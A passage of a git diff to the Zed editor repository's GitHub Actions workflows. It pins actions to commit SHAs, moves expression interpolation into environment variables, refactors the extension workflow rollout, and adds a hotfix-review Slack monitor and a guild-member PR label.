uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false fetch-depth: 0 @@ -97,10 +128,10 @@ jobs: - name: extension_tests::download_zed_extension_cli if: steps.cache-zed-extension-cli.outputs.cache-hit != 'true' run: | - wget --quiet "https://zed-extension-cli.nyc3.digitaloceanspaces.com/$ZED_EXTENSION_CLI_SHA/x86_64-unknown-linux-gnu/zed-extension" - chmod +x zed-extension + wget --quiet "https://zed-extension-cli.nyc3.digitaloceanspaces.com/$ZED_EXTENSION_CLI_SHA/x86_64-unknown-linux-gnu/zed-extension" -O "$GITHUB_WORKSPACE/zed-extension" + chmod +x "$GITHUB_WORKSPACE/zed-extension" - name: steps::cache_rust_dependencies_namespace - uses: namespacelabs/nscloud-cache-action@v1 + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 with: cache: rust path: ~/.rustup @@ -108,17 +139,30 @@ jobs: run: | mkdir -p /tmp/ext-scratch mkdir -p /tmp/ext-output - ./zed-extension --source-dir . --scratch-dir /tmp/ext-scratch --output-dir /tmp/ext-output + "$GITHUB_WORKSPACE/zed-extension" --source-dir . --scratch-dir /tmp/ext-scratch --output-dir /tmp/ext-output + - name: run_tests::fetch_ts_query_ls + uses: dsaltares/fetch-gh-release-asset@aa37ae5c44d3c9820bc12fe675e8670ecd93bd1c + with: + repo: ribru17/ts_query_ls + version: tags/v3.15.1 + file: ts_query_ls-x86_64-unknown-linux-gnu.tar.gz + - name: run_tests::run_ts_query_ls + run: |- + tar -xf "$GITHUB_WORKSPACE/ts_query_ls-x86_64-unknown-linux-gnu.tar.gz" -C "$GITHUB_WORKSPACE" + "$GITHUB_WORKSPACE/ts_query_ls" format --check . || { + echo "Found unformatted queries, please format them with ts_query_ls." + echo "For easy use, install the Tree-sitter query extension:" + echo "zed://extension/tree-sitter-query" + false + } - id: compare-versions-check name: extension_bump::compare_versions run: | CURRENT_VERSION="$(sed -n 's/^version = \"\(.*\)\"/\1/p' < extension.toml | tr -d '[:space:]')" - if [[ "${{ github.event_name }}" == "pull_request" ]]; then + if [[ "$GITHUB_EVENT_NAME" == "pull_request" ]]; then PR_FORK_POINT="$(git merge-base origin/main HEAD)" git checkout "$PR_FORK_POINT" - elif BRANCH_PARENT_SHA="$(git merge-base origin/main origin/zed-zippy-autobump)"; then - git checkout "$BRANCH_PARENT_SHA" else git checkout "$(git log -1 --format=%H)"~1 fi @@ -132,12 +176,19 @@ jobs: echo "current_version=${CURRENT_VERSION}" >> "$GITHUB_OUTPUT" - name: extension_tests::verify_version_did_not_change run: | - if [[ ${{ steps.compare-versions-check.outputs.version_changed }} == "true" && "${{ github.event_name }}" == "pull_request" && "${{ github.event.pull_request.user.login }}" != "zed-zippy[bot]" ]] ; then + if [[ "$VERSION_CHANGED" == "true" && "$GITHUB_EVENT_NAME" == "pull_request" && "$PR_USER_LOGIN" != "zed-zippy[bot]" ]] ; then echo "Version change detected in your change!" echo "Version changes happen in separate PRs and will be performed by the zed-zippy bot" exit 42 fi + env: + VERSION_CHANGED: ${{ steps.compare-versions-check.outputs.version_changed }} + PR_USER_LOGIN: ${{ github.event.pull_request.user.login }} timeout-minutes: 6 + defaults: + run: + shell: bash -euxo pipefail {0} + working-directory: ${{ inputs.working-directory }} tests_pass: needs: - orchestrate @@ -156,13 +207,17 @@ jobs: if [[ "$2" != "skipped" && "$2" != "success" ]]; then EXIT_CODE=1; fi } - check_result "orchestrate" "${{ needs.orchestrate.result }}" - check_result "check_rust" "${{ needs.check_rust.result }}" - check_result "check_extension" "${{ needs.check_extension.result }}" + check_result "orchestrate" "$RESULT_ORCHESTRATE" + check_result "check_rust" "$RESULT_CHECK_RUST" + check_result "check_extension" "$RESULT_CHECK_EXTENSION" exit $EXIT_CODE + env: + RESULT_ORCHESTRATE: ${{ needs.orchestrate.result }} + RESULT_CHECK_RUST: ${{ needs.check_rust.result }} + RESULT_CHECK_EXTENSION: ${{ needs.check_extension.result }} concurrency: - group: ${{ github.workflow }}-${{ github.ref_name }}-${{ github.ref_name == 'main' && github.sha || 'anysha' }} + group: ${{ github.workflow }}-${{ github.ref_name }}-${{ github.ref_name == 'main' && github.sha || 'anysha' }}extension-tests cancel-in-progress: true defaults: run: diff --git a/.github/workflows/extension_workflow_rollout.yml b/.github/workflows/extension_workflow_rollout.yml index 709956fc1bc0b25190638d9f1b5d4cd3cadd7ba2..5bb315a730d8f25f6e1eccbbe5e1734e1cda6d99 100644 --- a/.github/workflows/extension_workflow_rollout.yml +++ b/.github/workflows/extension_workflow_rollout.yml @@ -4,15 +4,60 @@ name: extension_workflow_rollout env: CARGO_TERM_COLOR: always on: - workflow_dispatch: {} + workflow_dispatch: + inputs: + filter-repos: + description: Comma-separated list of repository names to rollout to. Leave empty for all repos. + type: string + default: '' + change-description: + description: Description for the changes to be expected with this rollout + type: string + default: '' jobs: fetch_extension_repos: if: (github.repository_owner == 'zed-industries' || github.repository_owner == 'zed-extensions') && github.ref == 'refs/heads/main' runs-on: namespace-profile-2x4-ubuntu-2404 steps: + - name: checkout_zed_repo + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd + with: + clean: false + fetch-depth: 0 + - id: prev-tag + name: extension_workflow_rollout::fetch_extension_repos::get_previous_tag_commit + run: | + PREV_COMMIT=$(git rev-parse "extension-workflows^{commit}" 2>/dev/null || echo "") + if [ -z "$PREV_COMMIT" ]; then + echo "::error::No previous rollout tag 'extension-workflows' found. Cannot determine file changes." + exit 1 + fi + echo "Found previous rollout at commit: $PREV_COMMIT" + echo "prev_commit=$PREV_COMMIT" >> "$GITHUB_OUTPUT" + - id: calc-changes + name: extension_workflow_rollout::fetch_extension_repos::get_removed_files + run: | + for workflow_type in "ci" "shared"; do + if [ "$workflow_type" = "ci" ]; then + WORKFLOW_DIR="extensions/workflows" + else + WORKFLOW_DIR="extensions/workflows/shared" + fi + + REMOVED=$(git diff --name-status -M "$PREV_COMMIT" HEAD -- "$WORKFLOW_DIR" | \ + awk '/^D/ { print $2 } /^R/ { print $2 }' | \ + xargs -I{} basename {} 2>/dev/null | \ + tr '\n' ' ' || echo "") + REMOVED=$(echo "$REMOVED" | xargs) + + echo "Removed files for $workflow_type: $REMOVED" + echo "removed_${workflow_type}=$REMOVED" >> "$GITHUB_OUTPUT" + done + env: + PREV_COMMIT: ${{ steps.prev-tag.outputs.prev_commit }} - id: list-repos name: extension_workflow_rollout::fetch_extension_repos::get_repositories - uses: actions/github-script@v7 + uses: actions/github-script@f28e40c7f34bde8b3046d885e986cb6290c5673b with: script: | const repos = await github.paginate(github.rest.repos.listForOrg, { @@ -21,16 +66,42 @@ jobs: per_page: 100, }); - const filteredRepos = repos + let filteredRepos = repos .filter(repo => !repo.archived) .map(repo => repo.name); + const filterInput = `${{ inputs.filter-repos }}`.trim(); + if (filterInput.length > 0) { + const allowedNames = filterInput.split(',').map(s => s.trim()).filter(s => s.length > 0); + filteredRepos = filteredRepos.filter(name => allowedNames.includes(name)); + console.log(`Filter applied. Matched ${filteredRepos.length} repos from ${allowedNames.length} requested.`); + } + console.log(`Found ${filteredRepos.length} extension repos`); return filteredRepos; result-encoding: json + - name: steps::cache_rust_dependencies_namespace + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 + with: + cache: rust + path: ~/.rustup + - name: extension_workflow_rollout::fetch_extension_repos::generate_workflow_files + run: | + cargo xtask workflows "$COMMIT_SHA" + env: + COMMIT_SHA: ${{ github.sha }} + - name: extension_workflow_rollout::fetch_extension_repos::upload_workflow_files + uses: actions/upload-artifact@330a01c490aca151604b8cf639adc76d48f6c5d4 + with: + name: extension-workflow-files + path: extensions/workflows/**/*.yml + if-no-files-found: error outputs: repos: ${{ steps.list-repos.outputs.result }} - timeout-minutes: 5 + prev_commit: ${{ steps.prev-tag.outputs.prev_commit }} + removed_ci: ${{ steps.calc-changes.outputs.removed_ci }} + removed_shared: ${{ steps.calc-changes.outputs.removed_shared }} + timeout-minutes: 10 rollout_workflows_to_extension: needs: - fetch_extension_repos @@ -43,8 +114,8 @@ jobs: max-parallel: 10 steps: - id: generate-token - name: extension_bump::generate_token - uses: actions/create-github-app-token@v2 + name: steps::generate_token + uses: actions/create-github-app-token@f8d387b68d61c58ab83c6c016672934102569859 with: app-id: ${{ secrets.ZED_ZIPPY_APP_ID }} private-key: ${{ secrets.ZED_ZIPPY_APP_PRIVATE_KEY }} @@ -53,60 +124,28 @@ jobs: permission-pull-requests: write permission-contents: write permission-workflows: write - - name: checkout_zed_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 - with: - clean: false - fetch-depth: 0 - path: zed - name: checkout_extension_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - token: ${{ steps.generate-token.outputs.token }} path: extension repository: zed-extensions/${{ matrix.repo }} - - id: prev-tag - name: extension_workflow_rollout::rollout_workflows_to_extension::get_previous_tag_commit - run: | - PREV_COMMIT=$(git rev-parse "extension-workflows^{commit}" 2>/dev/null || echo "") - if [ -z "$PREV_COMMIT" ]; then - echo "::error::No previous rollout tag 'extension-workflows' found. Cannot determine file changes." - exit 1 - fi - echo "Found previous rollout at commit: $PREV_COMMIT" - echo "prev_commit=$PREV_COMMIT" >> "$GITHUB_OUTPUT" - working-directory: zed - - id: calc-changes - name: extension_workflow_rollout::rollout_workflows_to_extension::get_removed_files + token: ${{ steps.generate-token.outputs.token }} + - name: extension_workflow_rollout::rollout_workflows_to_extension::download_workflow_files + uses: actions/download-artifact@018cc2cf5baa6db3ef3c5f8a56943fffe632ef53 + with: + name: extension-workflow-files + path: workflow-files + - name: extension_workflow_rollout::rollout_workflows_to_extension::sync_workflow_files run: | - PREV_COMMIT="${{ steps.prev-tag.outputs.prev_commit }}" + mkdir -p extension/.github/workflows - if [ "${{ matrix.repo }}" = "workflows" ]; then - WORKFLOW_DIR="extensions/workflows" + if [ "$MATRIX_REPO" = "workflows" ]; then + REMOVED_FILES="$REMOVED_CI" else - WORKFLOW_DIR="extensions/workflows/shared" + REMOVED_FILES="$REMOVED_SHARED" fi - echo "Calculating changes from $PREV_COMMIT to HEAD for $WORKFLOW_DIR" - - # Get deleted files (status D) and renamed files (status R - old name needs removal) - # Using -M to detect renames, then extracting files that are gone from their original location - REMOVED_FILES=$(git diff --name-status -M "$PREV_COMMIT" HEAD -- "$WORKFLOW_DIR" | \ - awk '/^D/ { print $2 } /^R/ { print $2 }' | \ - xargs -I{} basename {} 2>/dev/null | \ - tr '\n' ' ' || echo "") - - REMOVED_FILES=$(echo "$REMOVED_FILES" | xargs) - - echo "Files to remove: $REMOVED_FILES" - echo "removed_files=$REMOVED_FILES" >> "$GITHUB_OUTPUT" - working-directory: zed - - name: extension_workflow_rollout::rollout_workflows_to_extension::sync_workflow_files - run: | - REMOVED_FILES="${{ steps.calc-changes.outputs.removed_files }}" - - mkdir -p extension/.github/workflows cd extension/.github/workflows if [ -n "$REMOVED_FILES" ]; then @@ -119,25 +158,30 @@ jobs: cd - > /dev/null - if [ "${{ matrix.repo }}" = "workflows" ]; then - cp zed/extensions/workflows/*.yml extension/.github/workflows/ + if [ "$MATRIX_REPO" = "workflows" ]; then + cp workflow-files/*.yml extension/.github/workflows/ else - cp zed/extensions/workflows/shared/*.yml extension/.github/workflows/ + cp workflow-files/shared/*.yml extension/.github/workflows/ fi + env: + REMOVED_CI: ${{ needs.fetch_extension_repos.outputs.removed_ci }} + REMOVED_SHARED: ${{ needs.fetch_extension_repos.outputs.removed_shared }} + MATRIX_REPO: ${{ matrix.repo }} - id: short-sha name: extension_workflow_rollout::rollout_workflows_to_extension::get_short_sha run: | - echo "sha_short=$(git rev-parse --short=7 HEAD)" >> "$GITHUB_OUTPUT" - working-directory: zed + echo "sha_short=$(echo "$GITHUB_SHA" | cut -c1-7)" >> "$GITHUB_OUTPUT" - id: create-pr name: extension_workflow_rollout::rollout_workflows_to_extension::create_pull_request - uses: peter-evans/create-pull-request@v7 + uses: peter-evans/create-pull-request@98357b18bf14b5342f975ff684046ec3b2a07725 with: path: extension title: Update CI workflows to `${{ steps.short-sha.outputs.sha_short }}` body: | This PR updates the CI workflow files from the main Zed repository based on the commit zed-industries/zed@${{ github.sha }} + + ${{ inputs.change-description }} commit-message: Update CI workflows to `${{ steps.short-sha.outputs.sha_short }}` branch: update-workflows committer: zed-zippy[bot] <234243425+zed-zippy[bot]@users.noreply.github.com> @@ -148,28 +192,29 @@ jobs: sign-commits: true - name: extension_workflow_rollout::rollout_workflows_to_extension::enable_auto_merge run: | - PR_NUMBER="${{ steps.create-pr.outputs.pull-request-number }}" if [ -n "$PR_NUMBER" ]; then - cd extension gh pr merge "$PR_NUMBER" --auto --squash fi env: GH_TOKEN: ${{ steps.generate-token.outputs.token }} + PR_NUMBER: ${{ steps.create-pr.outputs.pull-request-number }} + working-directory: extension timeout-minutes: 10 create_rollout_tag: needs: - rollout_workflows_to_extension + if: inputs.filter-repos == '' runs-on: namespace-profile-2x4-ubuntu-2404 steps: - id: generate-token - name: extension_bump::generate_token - uses: actions/create-github-app-token@v2 + name: steps::generate_token + uses: actions/create-github-app-token@f8d387b68d61c58ab83c6c016672934102569859 with: app-id: ${{ secrets.ZED_ZIPPY_APP_ID }} private-key: ${{ secrets.ZED_ZIPPY_APP_PRIVATE_KEY }} permission-contents: write - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false fetch-depth: 0 diff --git a/.github/workflows/good_first_issue_notifier.yml b/.github/workflows/good_first_issue_notifier.yml index f366c671726348f605325576d65e13c6faa5616e..fc1b49424dce248d107d35cd6f228dd297478cad 100644 --- a/.github/workflows/good_first_issue_notifier.yml +++ b/.github/workflows/good_first_issue_notifier.yml @@ -11,7 +11,7 @@ jobs: steps: - name: Checkout repository - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd # v5.0.1 - name: Prepare Discord message id: prepare-message diff --git a/.github/workflows/hotfix-review-monitor.yml b/.github/workflows/hotfix-review-monitor.yml new file mode 100644 index 0000000000000000000000000000000000000000..760cd9806c9928d784de1b69ed97c86148ae6fc1 --- /dev/null +++ b/.github/workflows/hotfix-review-monitor.yml @@ -0,0 +1,114 @@ +# Hotfix Review Monitor +# +# Runs daily and checks for merged PRs with the 'hotfix' label that have not +# received a post-merge review approval within one business day. Posts a summary to +# Slack if any are found. This is a SOC2 compensating control for the +# emergency hotfix fast path. +# +# Security note: No untrusted input (PR titles, bodies, etc.) is interpolated +# into shell commands. All PR metadata is read via gh API + jq, not via +# github.event context expressions. +# +# Required secrets: +# SLACK_WEBHOOK_PR_REVIEW_BOT - Incoming webhook URL for the #pr-review-ops channel + +name: Hotfix Review Monitor + +on: + schedule: + - cron: "30 13 * * 1-5" # 1:30 PM UTC weekdays + workflow_dispatch: {} + +permissions: + contents: read + pull-requests: read + +jobs: + check-hotfix-reviews: + if: github.repository_owner == 'zed-industries' + runs-on: ubuntu-latest + timeout-minutes: 5 + env: + REPO: ${{ github.repository }} + steps: + - name: Find unreviewed hotfixes + id: check + env: + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + # 80h lookback covers the Friday-to-Monday gap (72h) with buffer. + # Overlap on weekdays is harmless — reviewed PRs are filtered out below. + SINCE=$(date -u -v-80H +%Y-%m-%dT%H:%M:%SZ 2>/dev/null \ + || date -u -d '80 hours ago' +%Y-%m-%dT%H:%M:%SZ) + SINCE_DATE=$(echo "$SINCE" | cut -dT -f1) + + # Use the Search API to find hotfix PRs merged in the lookback window. + # The Pulls API with state=closed paginates through all closed PRs in + # the repo, which times out on large repos. The Search API supports + # merged:>DATE natively so GitHub does the filtering server-side. + gh api --paginate \ + "search/issues?q=repo:${REPO}+is:pr+is:merged+label:hotfix+merged:>${SINCE_DATE}&per_page=100" \ + --jq '[.items[] | {number, title, merged_at: .pull_request.merged_at}]' \ + > /tmp/hotfix_prs.json + + # Check each hotfix PR for a post-merge approving review + jq -r '.[].number' /tmp/hotfix_prs.json | while read -r PR_NUMBER; do + APPROVALS=$(gh api \ + "repos/${REPO}/pulls/${PR_NUMBER}/reviews" \ + --jq "[.[] | select(.state == \"APPROVED\")] | length") + + if [ "$APPROVALS" -eq 0 ]; then + jq ".[] | select(.number == ${PR_NUMBER})" /tmp/hotfix_prs.json + fi + done | jq -s '.' > /tmp/unreviewed.json + + COUNT=$(jq 'length' /tmp/unreviewed.json) + echo "count=$COUNT" >> "$GITHUB_OUTPUT" + + - name: Notify Slack + if: steps.check.outputs.count != '0' + env: + SLACK_WEBHOOK_PR_REVIEW_BOT: ${{ secrets.SLACK_WEBHOOK_PR_REVIEW_BOT }} + COUNT: ${{ steps.check.outputs.count }} + run: | + # Build Block Kit payload from JSON — no shell interpolation of PR titles. + # Why jq? PR titles are attacker-controllable input. By reading them + # through jq -r from the JSON file and passing the result to jq --arg, + # the content stays safely JSON-encoded in the final payload. Block Kit + # doesn't change this — the same jq pipeline feeds into the blocks + # structure instead of plain text. + PRS=$(jq -r '.[] | "• — \(.title) (merged \(.merged_at | split("T")[0]))"' /tmp/unreviewed.json) + + jq -n \ + --arg count "$COUNT" \ + --arg prs "$PRS" \ + '{ + text: ($count + " hotfix PR(s) still need post-merge review"), + blocks: [ + { + type: "section", + text: { + type: "mrkdwn", + text: (":rotating_light: *" + $count + " Hotfix PR(s) Need Post-Merge Review*") + } + }, + { + type: "section", + text: { type: "mrkdwn", text: $prs } + }, + { type: "divider" }, + { + type: "context", + elements: [{ + type: "mrkdwn", + text: "Hotfix PRs require review within one business day of merge." + }] + } + ] + }' | \ + curl -s -X POST "$SLACK_WEBHOOK_PR_REVIEW_BOT" \ + -H 'Content-Type: application/json' \ + -d @- +defaults: + run: + shell: bash -euxo pipefail {0} diff --git a/.github/workflows/pr_labeler.yml b/.github/workflows/pr_labeler.yml index cc9c4a9eefd4aa75ba69fb18b353efa6a32778c5..2f09ad681698d008845565c989b26f51c489d500 100644 --- a/.github/workflows/pr_labeler.yml +++ b/.github/workflows/pr_labeler.yml @@ -1,5 +1,6 @@ # Labels pull requests by author: 'bot' for bot accounts, 'staff' for -# staff team members, 'first contribution' for first-time external contributors. +# staff team members, 'guild' for guild members, 'first contribution' for +# first-time external contributors. name: PR Labeler on: @@ -16,7 +17,7 @@ jobs: timeout-minutes: 5 steps: - id: get-app-token - uses: actions/create-github-app-token@bef1eaf1c0ac2b148ee2a0a74c65fbe6db0631f1 # v2.1.4 + uses: actions/create-github-app-token@f8d387b68d61c58ab83c6c016672934102569859 # v3.0.0 with: app-id: ${{ secrets.ZED_COMMUNITY_BOT_APP_ID }} private-key: ${{ secrets.ZED_COMMUNITY_BOT_PRIVATE_KEY }} @@ -29,8 +30,50 @@ jobs: script: | const BOT_LABEL = 'bot'; const STAFF_LABEL = 'staff'; + const GUILD_LABEL = 'guild'; const FIRST_CONTRIBUTION_LABEL = 'first contribution'; const STAFF_TEAM_SLUG = 'staff'; + const GUILD_MEMBERS = [ + '11happy', + 'AidanV', + 'AmaanBilwar', + 'OmChillure', + 'Palanikannan1437', + 'Shivansh-25', + 'SkandaBhat', + 'TwistingTwists', + 'YEDASAVG', + 'Ziqi-Yang', + 'alanpjohn', + 'arjunkomath', + 'austincummings', + 'ayushk-1801', + 'claiwe', + 'criticic', + 'dongdong867', + 'emamulandalib', + 'eureka928', + 'feitreim', + 'iam-liam', + 'iksuddle', + 'ishaksebsib', + 'lingyaochu', + 'loadingalias', + 'marcocondrache', + 'mchisolm0', + 'mostlyKIGuess', + 'nairadithya', + 'nihalxkumar', + 'notJoon', + 'polyesterswing', + 'prayanshchh', + 'razeghi71', + 'sarmadgulzar', + 'seanstrom', + 'th0jensen', + 'tommyming', + 'virajbhartiya', + ]; const pr = context.payload.pull_request; const author = pr.user.login; @@ -71,6 +114,17 @@ jobs: return; } + if (GUILD_MEMBERS.includes(author)) { + await github.rest.issues.addLabels({ + owner: context.repo.owner, + repo: context.repo.repo, + issue_number: pr.number, + labels: [GUILD_LABEL] + }); + console.log(`PR #${pr.number} by ${author}: labeled '${GUILD_LABEL}' (guild member)`); + // No early return: guild members can also get 'first contribution' + } + // We use inverted logic here due to a suspected GitHub bug where first-time contributors // get 'NONE' instead of 'FIRST_TIME_CONTRIBUTOR' or 'FIRST_TIMER'. // https://github.com/orgs/community/discussions/78038 diff --git a/.github/workflows/publish_extension_cli.yml b/.github/workflows/publish_extension_cli.yml index 391baac1cb3aa9da76c4fde39aa6909525541a58..17248cea11307d4604b05d5160212a4f38e2874a 100644 --- a/.github/workflows/publish_extension_cli.yml +++ b/.github/workflows/publish_extension_cli.yml @@ -11,14 +11,14 @@ on: jobs: publish_job: if: (github.repository_owner == 'zed-industries' || github.repository_owner == 'zed-extensions') - runs-on: namespace-profile-2x4-ubuntu-2404 + runs-on: namespace-profile-16x32-ubuntu-2204 steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::cache_rust_dependencies_namespace - uses: namespacelabs/nscloud-cache-action@v1 + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 with: cache: rust path: ~/.rustup @@ -27,7 +27,7 @@ jobs: - name: publish_extension_cli::publish_job::build_extension_cli run: cargo build --release --package extension_cli - name: publish_extension_cli::publish_job::upload_binary - run: script/upload-extension-cli ${{ github.sha }} + run: script/upload-extension-cli "$GITHUB_SHA" env: DIGITALOCEAN_SPACES_ACCESS_KEY: ${{ secrets.DIGITALOCEAN_SPACES_ACCESS_KEY }} DIGITALOCEAN_SPACES_SECRET_KEY: ${{ secrets.DIGITALOCEAN_SPACES_SECRET_KEY }} @@ -38,32 +38,32 @@ jobs: runs-on: namespace-profile-8x16-ubuntu-2204 steps: - id: generate-token - name: extension_bump::generate_token - uses: actions/create-github-app-token@v2 + name: steps::generate_token + uses: actions/create-github-app-token@f8d387b68d61c58ab83c6c016672934102569859 with: app-id: ${{ secrets.ZED_ZIPPY_APP_ID }} private-key: ${{ secrets.ZED_ZIPPY_APP_PRIVATE_KEY }} - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::cache_rust_dependencies_namespace - uses: namespacelabs/nscloud-cache-action@v1 + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 with: cache: rust path: ~/.rustup - id: short-sha name: publish_extension_cli::get_short_sha run: | - echo "sha_short=$(echo "${{ github.sha }}" | cut -c1-7)" >> "$GITHUB_OUTPUT" + echo "sha_short=$(echo "$GITHUB_SHA" | cut -c1-7)" >> "$GITHUB_OUTPUT" - name: publish_extension_cli::update_sha_in_zed::replace_sha run: | - sed -i "s/ZED_EXTENSION_CLI_SHA: &str = \"[a-f0-9]*\"/ZED_EXTENSION_CLI_SHA: \&str = \"${{ github.sha }}\"/" \ + sed -i "s/ZED_EXTENSION_CLI_SHA: &str = \"[a-f0-9]*\"/ZED_EXTENSION_CLI_SHA: \&str = \"$GITHUB_SHA\"/" \ tooling/xtask/src/tasks/workflows/extension_tests.rs - name: publish_extension_cli::update_sha_in_zed::regenerate_workflows run: cargo xtask workflows - name: publish_extension_cli::create_pull_request_zed - uses: peter-evans/create-pull-request@v7 + uses: peter-evans/create-pull-request@98357b18bf14b5342f975ff684046ec3b2a07725 with: title: 'extension_ci: Bump extension CLI version to `${{ steps.short-sha.outputs.sha_short }}`' body: | @@ -87,8 +87,8 @@ jobs: runs-on: namespace-profile-2x4-ubuntu-2404 steps: - id: generate-token - name: extension_bump::generate_token - uses: actions/create-github-app-token@v2 + name: steps::generate_token + uses: actions/create-github-app-token@f8d387b68d61c58ab83c6c016672934102569859 with: app-id: ${{ secrets.ZED_ZIPPY_APP_ID }} private-key: ${{ secrets.ZED_ZIPPY_APP_PRIVATE_KEY }} @@ -97,7 +97,7 @@ jobs: - id: short-sha name: publish_extension_cli::get_short_sha run: | - echo "sha_short=$(echo "${{ github.sha }}" | cut -c1-7)" >> "$GITHUB_OUTPUT" + echo "sha_short=$(echo "$GITHUB_SHA" | cut -c1-7)" >> "$GITHUB_OUTPUT" - name: publish_extension_cli::update_sha_in_extensions::checkout_extensions_repo uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 with: @@ -105,10 +105,10 @@ jobs: token: ${{ steps.generate-token.outputs.token }} - name: publish_extension_cli::update_sha_in_extensions::replace_sha run: | - sed -i "s/ZED_EXTENSION_CLI_SHA: [a-f0-9]*/ZED_EXTENSION_CLI_SHA: ${{ github.sha }}/" \ + sed -i "s/ZED_EXTENSION_CLI_SHA: [a-f0-9]*/ZED_EXTENSION_CLI_SHA: $GITHUB_SHA/" \ .github/workflows/ci.yml - name: publish_extension_cli::create_pull_request_extensions - uses: peter-evans/create-pull-request@v7 + uses: peter-evans/create-pull-request@98357b18bf14b5342f975ff684046ec3b2a07725 with: title: Bump extension CLI version to `${{ steps.short-sha.outputs.sha_short }}` body: | diff --git a/.github/workflows/randomized_tests.yml b/.github/workflows/randomized_tests.yml index de96c3df78bdb67edd584696f02316478e4446dd..9655a81235d79e1e24ae5185ebce8c8051437392 100644 --- a/.github/workflows/randomized_tests.yml +++ b/.github/workflows/randomized_tests.yml @@ -28,7 +28,7 @@ jobs: node-version: "18" - name: Checkout repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd # v5.0.1 with: clean: false diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml index 4442b068a88800e8437d5c6e459acec954308946..1401144ab3abda17dd4f526edd42166d37a47a49 100644 --- a/.github/workflows/release.yml +++ b/.github/workflows/release.yml @@ -14,7 +14,7 @@ jobs: runs-on: namespace-profile-mac-large steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::setup_cargo_config @@ -22,7 +22,7 @@ jobs: mkdir -p ./../.cargo cp ./.cargo/ci-config.toml ./../.cargo/config.toml - name: steps::cache_rust_dependencies_namespace - uses: namespacelabs/nscloud-cache-action@v1 + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 with: cache: rust path: ~/.rustup @@ -31,7 +31,7 @@ jobs: with: node-version: '20' - name: steps::cargo_install_nextest - uses: taiki-e/install-action@nextest + uses: taiki-e/install-action@921e2c9f7148d7ba14cd819f417db338f63e733c - name: steps::clear_target_dir_if_large run: ./script/clear-target-dir-if-larger-than 300 - name: steps::setup_sccache @@ -43,6 +43,8 @@ jobs: SCCACHE_BUCKET: sccache-zed - name: steps::cargo_nextest run: cargo nextest run --workspace --no-fail-fast --no-tests=warn + - name: steps::cargo_build_visual_tests + run: cargo build -p zed --bin zed_visual_test_runner --features visual-tests - name: steps::show_sccache_stats run: sccache --show-stats || true - name: steps::cleanup_cargo_config @@ -53,9 +55,12 @@ jobs: run_tests_linux: if: (github.repository_owner == 'zed-industries' || github.repository_owner == 'zed-extensions') runs-on: namespace-profile-16x32-ubuntu-2204 + env: + CC: clang + CXX: clang++ steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::setup_cargo_config @@ -63,14 +68,12 @@ jobs: mkdir -p ./../.cargo cp ./.cargo/ci-config.toml ./../.cargo/config.toml - name: steps::cache_rust_dependencies_namespace - uses: namespacelabs/nscloud-cache-action@v1 + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 with: cache: rust path: ~/.rustup - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: steps::setup_node @@ -78,7 +81,7 @@ jobs: with: node-version: '20' - name: steps::cargo_install_nextest - uses: taiki-e/install-action@nextest + uses: taiki-e/install-action@921e2c9f7148d7ba14cd819f417db338f63e733c - name: steps::clear_target_dir_if_large run: ./script/clear-target-dir-if-larger-than 250 - name: steps::setup_sccache @@ -110,7 +113,7 @@ jobs: runs-on: self-32vcpu-windows-2022 steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::setup_cargo_config @@ -150,7 +153,7 @@ jobs: runs-on: namespace-profile-mac-large steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::setup_cargo_config @@ -158,7 +161,7 @@ jobs: mkdir -p ./../.cargo cp ./.cargo/ci-config.toml ./../.cargo/config.toml - name: steps::cache_rust_dependencies_namespace - uses: namespacelabs/nscloud-cache-action@v1 + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 with: cache: rust path: ~/.rustup @@ -177,9 +180,12 @@ jobs: clippy_linux: if: (github.repository_owner == 'zed-industries' || 